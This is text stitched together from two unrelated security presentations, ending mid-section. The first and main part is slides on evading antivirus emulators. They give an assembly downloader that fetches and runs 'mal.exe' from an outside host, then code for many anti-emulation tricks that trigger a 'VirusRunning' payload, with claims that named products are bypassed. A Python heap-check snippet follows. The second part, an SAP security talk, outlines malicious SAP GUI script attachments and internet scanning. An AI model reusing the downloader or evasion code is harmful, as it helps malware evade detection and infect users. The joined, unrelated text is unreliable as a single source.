implementation, which is extremely difficult to be fixed in a short period of time. These problems are the real deal to AV-Emulator and it is supposed to let us pay attention. Advanced Exploitation Techniques Simulate basic malware downloader function, complied by FAMS _url db 'http://vxjump.net/mal.exe',0 _mal db ‘c:\\windows\\system32\\mal.exe’,0 virus_run proc invoke URLDownloadToFile, 0, _url, _file, 0, 0 invoke ShellExecute, 0, 0, _mal, 0, 0, SW_SHOW Invoke ExitProcess,0 virus_run end start: call virus_run Process stack information inspection • Inspect at the address 0x10000 • The environment variable information stores at 0x10000 on WinXP, bypass AV- emulator by checking the position of value “00 00 00 00…”. Address Hex dump 00010000 41 00 4C 00 4C 00 55 00 53 00 45 00 52 00 53 00 A.L.L.U.S.E.R.S. 00010010 50 00 52 00 4F 00 46 00 49 00 4C 00 45 00 3D 00 P.R.O.F.I.L.E.=. 00010020 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 C.:.\.D.o.c.u.m. 00010030 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 e.n.t.s. .a.n.d. 1004020 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 .S.e.t.t.i.n.g. 
00010760 6E 00 64 00 69 00 72 00 3D 00 43 00 3A 00 5C 00 n.d.i.r.=.C.:.\. 00010770 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 00 00 W.I.N.D.O.W.S... 00010780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00010790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 000107C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ char *p = (char*)0x10000; for (int i = 0 ; i < 0xfff;i++){ dwFlag = (DWORD)*(DWORD*)(p+i); if (dwFlag == 0x00000000){ n++; if (n > 30){ break; } } else{ i++; } } Inspect process stack information > WINXP • Fetch the environment variable address of current process by calling GetEnvironmentStrings. • Then search the file path of current executable file,if there is no such information ,the code is running in the AV-Emulator. Address Hex dump 004B1FC8 3D 3A 3A 3D 3A 3A 5C 00 41 4C 4C 55 53 45 52 53 =::=::\.ALLUSERS 004B1FD8 50 52 4F 46 49 4C 45 3D 43 3A 5C 50 72 6F 67 72 PROFILE=C:\Progr 004B1FE8 61 6D 44 61 74 61 00 41 50 50 44 41 54 41 3D 43 amData.APPDATA=C 004B1FF8 3A 5C 55 73 65 72 73 5C 4A 69 66 65 6E 67 5C 41 :\Users\Jifeng\A 004B2008 70 70 44 61 74 61 5C 52 6F 61 6D 69 6E 67 00 43 ppData\Roaming.C 004B2018 4C 41 53 53 50 41 54 48 3D 3B 43 3A 5C 50 72 6F LASSPATH=;C:\Pro 004B2028 67 72 61 6D 20 46 69 6C 65 73 5C 4A 61 76 61 5C gram Files\Java\ 004B2038 6A 64 6B 31 2E 37 2E 30 5F 34 30 5C 6C 69 62 5C jdk1.7.0_40\lib\ Inspect process stack information DWORD min = (DWORD)pEnv; //char* pEnv = GetEnvironmentStrings(); pEnv = 0x004B1FC8 min -= 0x10000; min &= 0xffff0000; search range{min ,(DWORD)pEnv} Address Hex dump 004A59F9 44 3A 5C 5B 52 65 73 65 61 72 63 68 5D 5C 44 65 D:\[Research]\De 004A5A09 65 70 20 52 65 73 65 61 72 63 68 5C 41 64 76 61 ep Research\Adva 004A5A19 6E 63 65 64 20 42 79 70 61 73 73 20 41 56 56 4D nced Bypass AVVM 004A5A29 5C 64 65 6D 6F 5C 62 79 70 61 73 73 5F 6D 6D 78 \demo\bypass_mmx 004A5A39 5F 65 73 65 74 5C 62 79 70 61 73 73 65 73 74 5C _eset\bypassest\ 004A5A49 52 65 6C 65 61 73 65 5C 62 79 70 61 73 73 65 73 Release\bypasses 004A5A59 74 2E 65 78 65 22 00 AB AB AB AB AB AB AB AB 00 t.exe". . 004A5A69 00 00 00 00 00 00 00 FB 1E BA 58 01 C5 00 1C 43 .......?篨?C 004A5A79 00 3A 00 5C 00 57 00 69 00 6E 00 64 00 6F 00 77 .:.\.W.i.n.d.o.w Advanced Exploitation Techniques • Bypass: • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … • DEMO TIME Unknown MSG • HWND hWnd = CreateWindowEx(NULL, L"button", NULL, WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, 0, NULL); • MSG Msg; • GetMessage(&Msg, hWnd, 0,0) • Msg.message = > ?? • If(Msg.message == 0x31f) // first message in the queue • VirusRunning(); // bypass AV-Emulator Unknown MSG • HWND hWnd = CreateWindowEx(NULL, L"button", NULL, WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, 0, NULL); • CreateCaret(hWnd,0,0,0); • or • Flashwindow(hWnd,true); • MSG Msg; • GetMessage(&Msg, hWnd, 0,0) • Msg.message = > ?? 
• If(Msg.message == 0x118) // process a WM_SYSTEMTIMER message • VirusRunning(); // bypass AV-Emulator Advanced Exploitation Techniques • C++ provides friend class • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level class CExploitA : public CInterface { public: int m_pointer; friend class CExploitB; private: PROC m_caller; PROC Change() { m_caller = (PROC)m_pointer; return m_caller; } }; Exploiting C++ advanced syntactic features • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level class CExploitB : public CInterface { public: int m_pointer; virtual int GetPointer() { return m_pointer; } int CallRunVirus(CExploitA &A) { PROC call = A.Change(); call(); return TRUE; } } Void Test_VM() { CExploitA *a = new CExploitA; a->SetPointer((int)(PROC)VirusRunning); CExploitB *b = new CExploitB; b->CallRunVirus(*a); //the virus code will be running } Exploiting C++ advanced syntactic features • It provides variable access protection on compiler level • It makes the process of object construction complicated and hard for AV- Emulator to simulate on the binary level v2 = operator new(0x14u); if ( v2 ) { *((_DWORD *)v2 + 1) = -1718123434; *((_DWORD *)v2 + 2) = 0x7FFFFFFF; *((_DWORD *)v2 + 4) = 0; *(_DWORD *)v2 = &CExploitB::`vftable'; } (*(void (__thiscall **)(void *, void (__cdecl *)()))(*(_DWORD *)v1 + 8))(v1, VirusRunning); v3 = (void (*)(void))*((_DWORD *)v1 + 2); *((_DWORD *)v1 + 5) = v3; v3(); return 1; Exploiting C++ advanced syntactic features Bypass • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Essentially, any of advanced semantic feature have abilities to negatively affect AV-Emulator technology, such as smart pointer, C++ exception ... DEMO TIME Exploiting C++ advanced syntactic features 1. Class object stores in smart pointer. 2. The object’s destructor would be called when the lifecycle of smart pointer ends. 3. Malicious function would be called within the object’s destructor. Void TestVM(){ shared_ptr <CExploitC> myptr(new CExploitC); myptr->SetPointer((int)(PROC)VirusRunning); return ; } class CExploitC : public CInterface{ public: CExploitC::~CExploitC() { m_call();} virtual int SetPointer(int pointer){ m_call = (PROC)pointer; return m_pointer;} }; Exploiting C++ advanced syntactic features Using a smart pointer lifecycle to execute malicious functions when destructor releases resources Bypass Kaspersky KIS2016 { .. LOBYTE(v11) = 2; a[0] = 0; a[1] = 0; *(_DWORD *)std::shared_ptr<CExploitC>::operator->(&myptr)->m_pointer = 0; v3 = 1; v11 = -1; std::shared_ptr<CExploitC>::~shared_ptr<CExploitC>(&myptr); return v3;} Advanced Exploitation Techniques 1) Randomized conditional branch generation could possibly trap the AV-Emulator into false branch, therefore no malicious behavior is triggered. We need to search specific APIs which return random values, such as BOOL WINAPI FindFirstFreeAce( _In_ PACL pAcl, // When invoked ,the pAc will be modified _Out_ LPVOID *pAce ); UINT WINAPI MapVirtualKey( //When invoked ,will return a value which is random integer _In_ UINT uCode, _In_ UINT uMapType); Randomized Conditional Branch 2)We write a custom function and make the stack unbalanced on purpose. 
3)The combination of unbalanced stack and crafted conditional branch would make AV-Emulator jump into a branch which no malicious is triggered. We need to search specific APIs which return random values, such as BOOL WINAPI FindFirstFreeAce( _In_ PACL pAcl, // The pAc would be modified after invoked _Out_ LPVOID *pAce ); UINT WINAPI MapVirtualKey( // This API returns a random value. _In_ UINT uCode, _In_ UINT uMapType); Randomized Conditional Branch Randomized conditional branch generation could possibly trap the AV_Emulator into false branch, therefore no malicious behavior is triggered. fake_call_A proc … call MapVirtualKey cmp eax,10h jg @f pop eax pop ebx ret @@: ret fake_call_B proc call FindFirstFreeAce mov eax,offset out_p1 mov ebx,[eax] cmp eax,ebx jl @f pop eax pop ebx ret @@: ret main proc call fake_call_X End main Fake_call_x proc ... Fake_call_A End fake_call_X Randomized Conditional Branch bypass • Kaspersky <= KIS2012 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … <= Kaspersky KIS2012 , cannot bypass Kaspersky later version, the KIS simulate the situation that two branches are both true. Randomized Conditional Branch Custom craft of stack parameter, push encrypted address of function VirusRunning CustomerFun() { … push VirusRunning call API ret } TestVM() { call CustomerFunc } Paramer 1 Paramer 2 Paramer 3 VirusRunning Paramer …n API_ret_addr Randomized Conditional Branch VirusRunning = VirusRunning xor 0xfffffff8 ;encryption of address Mov eax,VirusRunning Xor eax,0xfffffff8 Push eax // push a encrypted of address Xor eax,0xfffffff8 Mov [esp],eax ret // the virus code will control execution flow again. Randomized Conditional Branch Bypass • >=Kaspersky KIS2013 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … DEMO TIME Advanced Exploitation Techniques Run malicious core code by using the tech like ROP Gadget 1) The AV-Emulator simulates APIs 2) Typically, the underlying DLL module like Ntdll doesn’t have to be simulated. Such as Kernel32.CreateFile --- > ntdll.NtCreateFile 3) Ntdll module is not loaded into simulate environment of AV-Emulator 4) The AV-Emulator is not able to detect the malicious function which is called from the ‘ret’ instruction within Ntdll module. Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 1)Acquire kernel32 module base address by accessing EAX 2)Search a statement from kernel32 module, which can be used to call Ntdll. 77E15947 FF15 8412DE77 CALL DWORD PTR DS:[<&ntdll. NtQueryInformationToken>; 77E1594D 3BC3 CMP EAX,EBX Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 3)Calculate base address of Ntdll module by using QueryInformationToken address 4) Push the address of function VirusRunning onto stack. 
add edx,0x29e push VirusRunning push edi push esi push ebx jmp edx // jump a gadget Simulate ROP ways to execute core code Simulate ROP ways to execute core code - windows 7 X86 SP1 EOP: EAX 75443368 kernel32.BaseThreadInitThunk ECX 00000000 EDX 004014AA bypasses.<ModuleEntryPoint> EBX 7EFDE000 ESP 0018FF8C ASCII "z3Du" EBP 0018FF94 ESI 00000000 EDI 00000000 EIP 004014AA bypasses.<ModuleEntryPoint> 5) ;jump to ntdll gadget ;.text:77EC96C5 pop edi ;.text:77EC96C6 pop esi ;.text:77EC96C7 mov eax, ebx ;.text:77EC96C9 pop ebx ;.text:77EC96CA retn Simulate ROP ways to execute core code Bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … As long as we can find a module which can not be loaded by AV- Emulator. It can be leveraged to bypass AV-Emulators. DEMO TIME Advanced Exploitation Techniques • DLL forwarding • It is hard for AV-Emulator to do DLL forwarding because AV-Emulator typically scans import table or dynamically loads API to determine if an API can be called. • For now, the AV-Emulator is still not able to simulate indirect DLL forwarding. Exploiting DLL Forwarding • How to build a call? URLDownloadToFile 1. We need to find a particular API which is not reported as risk by AV-Emulator. 2. The API from phase #1 can load URLMon.DLL indirectly. • API HrSniffUrlForRfc822 meets the above requirement. Exploiting DLL Forwarding signed int __stdcall HrSniffUrlForRfc822(LPCWSTR ppwzMimeOut) { signed int v1; // edi@1 v1 = 1; if ( FindMimeFromData(0, ppwzMimeOut, 0, 0, 0, 0, (LPWSTR *)&ppwzMimeOut, 0) >= 0 ) { if ( !StrCmpW(ppwzMimeOut, L"message/rfc822") ) v1 = 0; CoTaskMemFree((LPVOID)ppwzMimeOut); } return v1; } Exploiting DLL Forwarding __stdcall CBody::Load(int, struct IMoniker *, struct IBindCtx *, unsigned long) -> HrSniffUrlForRfc822(LPCWSTR ppwzMimeOut) -> FindMimeFromData(x,x,x,x,x,x,x,x) -> 583D452D 8945 F8 MOV DWORD PTR SS:[EBP-8],EAX 583D4530 85D2 TEST EDX,EDX 583D4532 75 4D JNZ SHORT inetcomm.583D4581 583D4534 52 PUSH EDX 583D4535 52 PUSH EDX 583D4536 53 PUSH EBX 583D4537 E8 15E5FFFF CALL <JMP.&KERNEL32.LoadLibraryExA> 0012FEF8 58476EB0 皀GX |FileName = "urlmon.dll" 0012FEFC 00000000 .... |hFile = NULL 0012FF00 00000000 .... \Flags = 0 0012FF04 00000001 ... 0012FF08 00000000 .... Exploiting DLL Forwarding • Bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Advanced Exploitation Techniques • Heap allocation/free • Windows memory heap mechanism is very complicated, typically the AV-Emulator allocates chunks of memory pool to simulate memory operations of malicious program. • Taking advantage of windows heap feature, the information of heap structure is predictable, but AV-Emulator does not have such simulation. Exploiting Windows heap management mechanism HLOCAL h1,h2,h3,h4,h5,h6; HANDLE hp; hp = HeapCreate(0,0x1000,0); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,32); h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); free h2 HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == h1) { printf("virurunning ...\n"); VirusRunning();} Block :16 Block :32 Block:16 Block :64 Exploiting Windows heap management mechanism After freeing h2 block that heap size = 32,the heap manager will review if there is a free heap block nearby h2 first, if so, it will be merged into heap block that size is 64 ,rather than adding h2 into the Freelist. 
Therefore, when allocate heap block that size is 64, it would use the merged heap block directly. We can predict the case that h4 == h1. Bypass • Norman Suite 11 • Bitdefender Anti-virus2016 • VBA32 \ • … Exploiting Windows heap management mechanism Furthermore, we modify the heap block pointer “Flink” and “Blink”. If do so, it would break the heap merging operation, lead to the failure of h4 allocation, but AV-Emulator does not simulate such behavior. Exploiting Windows heap management mechanism After freeing three heap blocks 0:000> !heap -a 01460000 Index Address Name Debugging options enabled 6: 01460000 Segment at 01460000 to 01470000 (00001000 bytes committed) Flags: 00001002 Heap entries for Segment00 in Heap 01460000 01460000: 00000 . 00588 [101] - busy (587) 01460588: 00588 . 00240 [101] - busy (23f) 014607c8: 00240 . 00818 [100] 01460fe0: 00818 . 00020 [111] - busy (1d) 01461000: 0000f000 - uncommitted bytes. Exploiting Windows heap management mechanism Before Flink /Blink modification 0:000> !heap -x 014607c8 Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 014607c8 014607d0 01460000 01460000 818 240 0 free Exploiting Windows heap management mechanism After Flink ,Blink modification 0:000> !heap -x 014607c8 List corrupted: (Blink->Flink = 014600c4) != (Block = 014607d0) HEAP 01460000 (Seg 01460000) At 014607c8 Error: block list entry corrupted Entry User Heap Segment Size PrevSize Unused Flags ----------------------------------------------------------------------------- 014607c8 014607d0 01460000 01460000 818 240 0 free Exploiting Windows heap management mechanism The heap manager would not be able to allocate new memory space to h4 anymore. But the AV-Emulator do not have such feature, thus we can bypass the emulator as below: Exploiting Windows heap management mechanism HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); int diff = (16+8)+ (32+8) + (16+8); int nlink = (int)h1 + diff; *(int *)h1 = nlink; *((int *)h1+1) = nlink; h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == 0) { printf("virurunning ...\n"); VirusRunning(); } Exploiting Windows heap management mechanism +0x0c4 FreeLists: _LIST_ENTRY [ 0x4f07d0 - 0x4f07d0 ] 004f07c8 13f806e1 00004631 004f00c4 004f00c4 004f07d8 41414141 41414141 04010005 0800467a 004f07e8 42424242 42424242 42424242 42424242 004f07f8 42424242 42424242 42424242 42424242 004f0808 fb0000fb 00004671 004f00c4 004f00c4 004f0818 43434343 43434343 f80000f8 0000467a 004f0828 004f00c4 004f07d0 00000000 00000000 HEAP Offset 0xc4-FreeList h1:0X14607D0 h3:0x1460828 Exploiting Windows heap management mechanism +0x0c4 FreeLists: _LIST_ENTRY [ 0x4f07d0 - 0x4f07d0 ] 004f07c8 13f806e1 00004631 004f0828 004f0828 004f07d8 41414141 41414141 04010005 0800467a 004f07e8 42424242 42424242 42424242 42424242 004f07f8 42424242 42424242 42424242 42424242 004f0808 fb0000fb 00004671 004f00c4 004f00c4 004f0818 43434343 43434343 f80000f8 0000467a 004f0828 004f00c4 004f07d0 00000000 00000000 HEAP Offset 0xc4-FreeList h1:0X14607D0 h3:0x1460828 Exploiting Windows heap management mechanism • Ntdll.RtlpAllocateHeap fails on memory allocation 776a5f0d 8d4e08 lea ecx,[esi+8] 776a5f10 8b39 mov edi,dword ptr [ecx] 776a5f12 897db8 mov dword ptr [ebp-48h],edi 776a5f15 8b560c mov edx,dword ptr [esi+0Ch] 776a5f18 895598 mov dword ptr [ebp-68h],edx 776a5f1b 8b12 mov edx,dword ptr [edx] 776a5f1d 8b7f04 mov edi,dword ptr [edi+4] 776a5f20 3bd7 cmp edx,edi 776a5f22 0f85674a0200 jne ntdll!RtlpAllocateHeap+0x7a3 
Exploiting Windows heap management mechanism • Ntdll.RtlpAllocateHeap fails on memory allocation. if ( v47 == *(_DWORD *)(*(_DWORD *)v120 + 4) && v47 == v120 ){… *(_DWORD *)(v44 + 120) -= v45; *(_DWORD *)v22 = v67; } goto LABEL_78; } v94 = v47; v93 = *(_DWORD *)(*(_DWORD *)v120 + 4); v92 = v120; v91 = v126; LABEL_252: RtlpLogHeapFailure(12, v91, v92, v93, v94, 0); FreeList : Flink Blink free.Block: Flink Blik Exploiting Windows heap management mechanism HeapFree(hp,0,h1); HeapFree(hp,0,h3); HeapFree(hp,0,h2); int diff = (16+8)+ (32+8) + (16+8); int nlink = (int)h1 + diff; *(int *)h1 = nlink; *((int *)h1+1) = nlink; h4 = HeapAlloc(hp,HEAP_ZERO_MEMORY,60); if (h4 == 0) { printf("virurunning ...\n"); VirusRunning(); } Exploiting Windows heap management mechanism If(h4 == 0) , we can bypass • Kaspersky KIS2016 • Norman Suite 11 • Bitdefender Anti-virus2016 • ESET Smart Seurity8 • VBA32 • … Advanced Exploitation Techniques •In fact, the bypass mechanism is quite simple, let's take a look at the code like this: Exploiting Windows heap management mechanism hp = HeapCreate(0,0x1000,0x10000); for (int i = 0 ; i < 10 ; i++) { h[i] = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); } HeapFree(hp,0,h[0]); HeapFree(hp,0,h[2]); HeapFree(hp,0,h[4]); HLOCAL hfixed = h[4]; HLOCAL hx = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); if (hx == hfixed ) { printf("virurunning ...\n"); VirusRunning(); } Advanced Exploitation Techniques • Life is tough, you can use a variety of tricks to distinguish AV-Emulator from real machine; • Any predictable information of heap allocation/free • Heap header information (After calling HeapFree) • Heap list operations like add, delete ,and break • Heapspray … Advanced Exploitation Techniques • The examples of heap operations indicate: • If we dig into any of the OS features, it probably can be used to bypass emulator. • At present, it is difficult to build a sophisticated AV-Emulator that runs like real machine • We have opened Pandora box. DEMO TIME • Bypass Kaspersky KIS16.0.1.445zh-hans-cn_full.exe • Other products End-point AV AV-Emulator Bypass Mitigation • It is not easy for AV-Emulator to mitigate bypass because of lack of effective countermeasures. • Take more effort on depth of static heuristic analysis in order to avoid the problems of condition or branch. • In order to protect the internal detection logic of AV-Emulator, the emulator is supposed to reject a huge amount of scanning requests in a very short time. Thank You! Q&&A neineit@gmalil.com http://www.vxjump.net Thanks to Bing Sun gives me some cool ideas. Thanks to Linxer talked about VM inside details with me.
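The heap-layout trick from the last section can be reproduced from Python with ctypes against the real Win32 heap API, which makes a handy self-test. On the pre-LFH 32-bit heap behaviour the slides describe, the real allocator coalesces the three freed chunks and the new 60-byte allocation comes back at h1, while a simplified emulator heap typically does not model coalescing. The call signatures and constants below are the documented kernel32 ones; the h4 == h1 prediction itself is an assumption tied to that older heap front end and may not hold on modern Windows.

import ctypes
from ctypes import wintypes

k32 = ctypes.WinDLL("kernel32", use_last_error=True)
k32.HeapCreate.restype = ctypes.c_void_p
k32.HeapCreate.argtypes = [wintypes.DWORD, ctypes.c_size_t, ctypes.c_size_t]
k32.HeapAlloc.restype = ctypes.c_void_p
k32.HeapAlloc.argtypes = [ctypes.c_void_p, wintypes.DWORD, ctypes.c_size_t]
k32.HeapFree.restype = wintypes.BOOL
k32.HeapFree.argtypes = [ctypes.c_void_p, wintypes.DWORD, ctypes.c_void_p]

HEAP_ZERO_MEMORY = 0x8

hp = k32.HeapCreate(0, 0x1000, 0)
h1 = k32.HeapAlloc(hp, HEAP_ZERO_MEMORY, 16)
h2 = k32.HeapAlloc(hp, HEAP_ZERO_MEMORY, 32)
h3 = k32.HeapAlloc(hp, HEAP_ZERO_MEMORY, 16)

# Free in the same order as the slides: the neighbours first, the middle block
# last, so the heap manager coalesces h1+h2+h3 into one larger free chunk.
k32.HeapFree(hp, 0, h1)
k32.HeapFree(hp, 0, h3)
k32.HeapFree(hp, 0, h2)

# A real (pre-LFH) heap hands the coalesced chunk back, so h4 should land at h1;
# a typical emulator's simplified allocator will not reproduce this.
h4 = k32.HeapAlloc(hp, HEAP_ZERO_MEMORY, 60)
print("looks like a real machine:", h4 == h1)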
DISCLAIMER • This publication contains references to the products of SAP AG. SAP, R/3, SAP NetWeaver and other SAP products. • Products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany, in the US and in several other countries all over the world. • SAP AG is neither the author nor the publisher of this publication and is not responsible for its content. The SAP Group shall not be liable for errors or omissions with respect to the materials. Vicxer, Inc. Is a registered Trademark. All rights reserved. Reproduction of this presentation without author’s consent is forbidden. JOR DAN SANTARSIERI VICXER’S FOUNDER Originally devoted to Penetration Testing, Vulnerability Research & Exploit writing, discovered several vulnerabilities in Oracle, SAP, IBM and many others. Speaker and trainer at Black-Hat, OWASP-US, Hacker Halted, YSTS, Insomni’hack, AusCERT, Sec-T, RootCon, Ekoparty, etc. I started researching ERP Software back in 2008. Had the honor to secure more than 1000 SAP implementations all around the globe, including Fortune-500 companies, military institutions and the biggest ONG on the planet. @ J S A N T A R S I E R I CHAPTER 02 Project ARSAP is Born CHAPTER 04 Ransomware and the Weaponization of Weaknesses CHAPTER 01 Brief Introduction to SAP CHAPTER 03 A Traditional Approach to Malware Distribution INTRODUCTION CHAPTER 01 A Brief Introduction to SAP WHAT IS SAP? • SAP stands for Systems Applications and Products in Data Processing. It is a German company founded in 1972 by ex-IBM employees. • SAP counts 88,500+ Employees Worldwide • SAP Has 378,000+ Customers • Is Present in More Than 180 Countries • Dominate the Market With 87% of Forbes Global 2000 • SAP ERP (Enterprise Resource Planning) • SAP BI (Business Intelligence) • SAP CRM (Customer Relationship Management) • SAP SRM (Supplier Relationship Management) TWO TYPES OF SAP SOLUTIONS ENTERPRISE SOLUTIONS SUPPORTING SOLUTIONS • SAP GRC (Government Risk and Compliance) • SAP Business Objects • SAP Mobile • SAP Cloud Connectors These Solutions, provide direct services to end users These Solutions support the operations of the Enterprise Solutions SAP NETWEAVER • Netweaver is the framework where SAP is built in. It is the most important technology so far as it synchronizes and regulates the operatory of the different SAP components • Netweaver is service oriented! and it is divided in two different stacks, ABAP & J2EE. Database Operating System SAP Business Logic SAP Application Layer SAP Netweaver System SAP Solution Base Infrastructure SAP NETWEAVER • Each stack counts with different services, some of them are shared between stacks, some others are not • Each one of those services will have its own protocol for communications. Some of them are open, but most of them are proprietary SAP USER CLIENTS • There are MANY ways that a regular user could use to connect to the SAP systems. The most popular ones are: • SAP GUI (SAP proprietary protocol, extra thick client, around 1.4Gb of size) • SAP Web Application Servers (ICM, Java HTTP, XSA) IN A FEW WORDS … • Why would someone attack your SAP implementation? Easy…. CHAPTER 02 A NEW BEGINNING “Project ARSAP is Born” ABOUT US WE ARE VICXER! 
• A company focused in securing the business critical applications and its adjacent infrastructure (SAP, Oracle Siebel and others) • All of our customers belong to the Fortune-500 Group • We do: Oracle & SAP Penetration Testing Cyber-Security Trainings Vulnerability Assessment and Management SAP Forensics & Many More! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • As a young company, we had the same challenges that everyone else has when they just start, getting new leads that could end-up in new customers • The approach that most companies take here, is to simply buy a list of businesses that are already running SAP, so they can try to “cold call” the CISO / security managers and pitch what they do • The success rate of this procedure is 1%, same success rate that the spammers get. Coincidence? I think not! • We said to ourselves, this cannot be the best possible way! there must be a more efficient way to tackle this challenge ……. and then the project ARSAP was born! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • We used search engines like Shodan, Google, Bing, ZoomEye to more “sketchy” and esoteric deep-web resources (deep-web search engines, private forums, etc.) in order to find the different SAP systems (ABAP, Java, Business Objects, HANA) that were already exposed to the Internet • We ended-up creating one “extractor” per each data-source, as we knew since the very beginning that the SAP map that we would obtain would be “alive”, meaning that the discovered SAP systems could come and go every-day (yes, people tend to expose non-productive SAP systems to the Internet too!) • Once we had a list of servers, we also had the necessity of categorizing and tagging the detected SAP systems for further analysis. Fortunately for us, the exposed SAP services were QUITE verbose! PROJECT ARSAP “Sometimes, reinventing the wheel makes sense” - Scenario • At this point, we did not only have the list of exposed SAP systems, but we were also able to classify them per the exposed SAP services, country & continent (of the server hosting the SAP system), SSL support and the different SAP / services version! • We used different techniques to discover what companies / individuals were behind the discovered assets. • Now, of course, we needed a way to prioritize our efforts on which potential clients we would contact first, so what we did offline, was to analyze the detected SAP services versions and compare them to our own vulnerability database. This exercise allowed us to also classify the SAPs per “potential” risk (as we did not actually trigger any attack probes) Are you intrigued about the results? PROJECT ARSAP “ARSAP By the Numbers” • We found more than 14k SAP Services PROJECT ARSAP “ARSAP By the Numbers” • We have identified the owners of 37.86% of the detected assets PROJECT ARSAP “ARSAP By the Numbers” • We also discovered that at least 27% of the detected assets were potentially vulnerable to critical and high criticity vulnerabilities like RCE, Directory Transversal, Arbitrary File uploads / Arbitrary File Reads • We ended up being highly surprised by our discoveries and we immediately started to think that a sufficiently skilled attacker could provoke the “next SAP tragedy” without much effort • How? you say, well, keep watching … YOU GOT EMAIL! 
CHAPTER 03 “A traditional approach to malware distribution” “A traditional approach to Malware distribution” – Thinking Like an Attacker • Think about it, if you were an attacker who has recollected the information that we highlighted on the previous slides, it would be trivial for you to enumerate email addresses from the people that works at the target company • You know that the target organization uses SAP, probably across the board • You know that the target organization has enough resources to acquire and use an SAP system. This indicates that the level of resources belonging to the company are high and the head-count is significant • Almost all the big companies, with good amount of resources and a lot of employees use SSO (Single Sign-on) to facilitate access to SAP YOU GOT EMAIL! “SAP Gui Scripts” • In SAP Words • By default, the execution of SAP GUI scripts is disabled, but in our experience, 90% of corporate users use this functionality to do performance and functional testing YOU GOT EMAIL! “SAP GUI Scripting is an automation interface that enhances the capabilities of SAP GUI. By using this interface, end users may automate repetitive tasks by running macro-like scripts” “SAP Gui Scripts” • The attacker has already harvested some corporate email accounts and is ready to send some malware • The distribution channel will be an email with a malicious SAP GUI Script attached to it • The attacker will leverage the privileges of the victim and use them to completely delete a table containing public debt, Robin Hood Style! YOU GOT EMAIL! WEAPONIZATION “You Got Email!” - Scenario USER’S VLAN SERVER’S VLAN SAP End-User Back-End SAP ABAP System Attacker “SAP Gui Scripts” - Prevention • If your organization is lucky enough to not need SAP Gui scripts, you could disable this functionality by making sure that the sapgui/user_scripting profile parameter is set to FALSE • As we mention before, most organizations cannot afford disabling SAP Gui scripts, but fear not, there is a valid workaround! • Leave the SAP Gui scripts enable and configure the script/user_scripting_per_user parameter to TRUE, then, just assign the authorization object S_SCR with value 16 to (only) the users that are allowed to use this functionality YOU GOT EMAIL! “SAP Gui Scripts” - Prevention • Also, at the client level, make sure you select the “Notify when a script attaches to SAP GUI” option, to get a warning from the SAP GUI whenever a scripts tries to be executed YOU GOT EMAIL! “Ransomware and the weaponization of weaknesses” CHAPTER 04 WEAPONIZATION & PREVENTION WEAPONIZATION “The Ransomware Approach” • One of our recurrent thoughts after having the complete picture of the SAPs that were exposed to the Internet was “If a ransomware hits the SAP systems exposed to the Internet, the results would be catastrophic” • We wanted to help, but before we could recommend some countermeasures, we needed to think how an attacker could try to take over these assets…. 
